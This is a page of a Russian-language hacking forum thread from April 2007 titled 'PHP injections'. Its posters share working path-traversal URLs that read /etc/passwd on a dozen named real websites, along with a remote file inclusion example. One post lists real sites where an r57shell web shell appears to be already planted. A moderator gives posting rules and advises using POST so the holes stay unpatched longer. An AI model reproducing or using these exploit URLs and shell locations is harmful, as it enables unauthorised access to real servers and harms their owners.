Форум АНТИЧАТ
Страница 1 из 116 1 2 3 4 5 1151101 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   PHP Иньекции (https://forum.antichat.xyz/showthread.php?t=38443)

Joker-jar 20.04.2007 18:15
PHP Иньекции
 
XSS, SQL inj нашел, а вот инклудинга в упор не вижу...
Код:
http://www.rupivo.ru/papers.php?file=../../../../../../etc/passwd
http://quake.olympus.ru/q3/playerstat.php?config=../../../../../../../etc/passwd

guest3297 20.04.2007 19:33
Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.

+Постим только:
+php/perl/jsp иньекции.
+Исполнение произвольного кода.
+Исполнение произвольных команд.

+Статья php injection(http://forum.antichat.ru/thread12123.html).

+За флуд буду строго наказывать.
+Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут(http://forum.antichat.ru/thread24973.html).

При удаленных инклудах
Постим так:
Цитата:
http://site.com/index.php?page=[url]

VampiRUS 21.04.2007 04:04
Цитата:
http://www.giga-hamburg.de/index.php?file=../../../../../../../../../../../../../etc/passwd&folder=giga
запостю, только чёт я не уверен что будет такая же активность.

InferNo23 21.04.2007 10:55
Код:
http://primotechnology.com/index.php?art=../../../../../etc/passwd
уже 210 просомтоов топика..

NOmeR1 21.04.2007 11:57
Порадовало :D
Цитата:
http://www.jff.org/download.php?file=../../../../../../etc/passwd - сохраняем и открываем

NOmeR1 21.04.2007 11:59
Цитата:
http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем

s1mt 21.04.2007 12:01
http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd

V1k 21.04.2007 12:52
Удаленный инклуд:

Код:
http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?
Немного оффтоп, стало сейчас интересно, всё ли еще можно что-то найти в гугле по запросу "r57shell - http-shell by RST/GHC":

Код:
http://www.aodaitimhue.com/nhacrock/info.php
http://www.shp-berlin.de/en/expertise.php
http://www.auschwitzdanceparty.org/conf/r57.php
http://live8x.com/images/kol.php
http://www.securitysafetysystems.com/includes/mysqlconfig.local.php
http://www.huyhoangkontum.org/h.php
http://www.sniperfoxselacome.com/index.php
http://www.hostingstar.us/rapid/ab.php
http://www.aongtr.ro/g.php
http://wwwreal-estate.com/rel-estate-info/wp-commentsrs.php

zl0ba 21.04.2007 13:08
Цитата:
http://www.webcreativestudio.com/?id=inter&param=doc_php&lang=2&doc_dop_param=../../../../../../../../etc/passwd
И просматриваем в исходном тексте =)

NOmeR1 21.04.2007 13:09
Цитата:
http://en.brazilny.org/force-download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем


Время: 22:42
Страница 1 из 116 1 2 3 4 5 1151101 > Последняя »
Показывать 40 сообщений этой темы на одной странице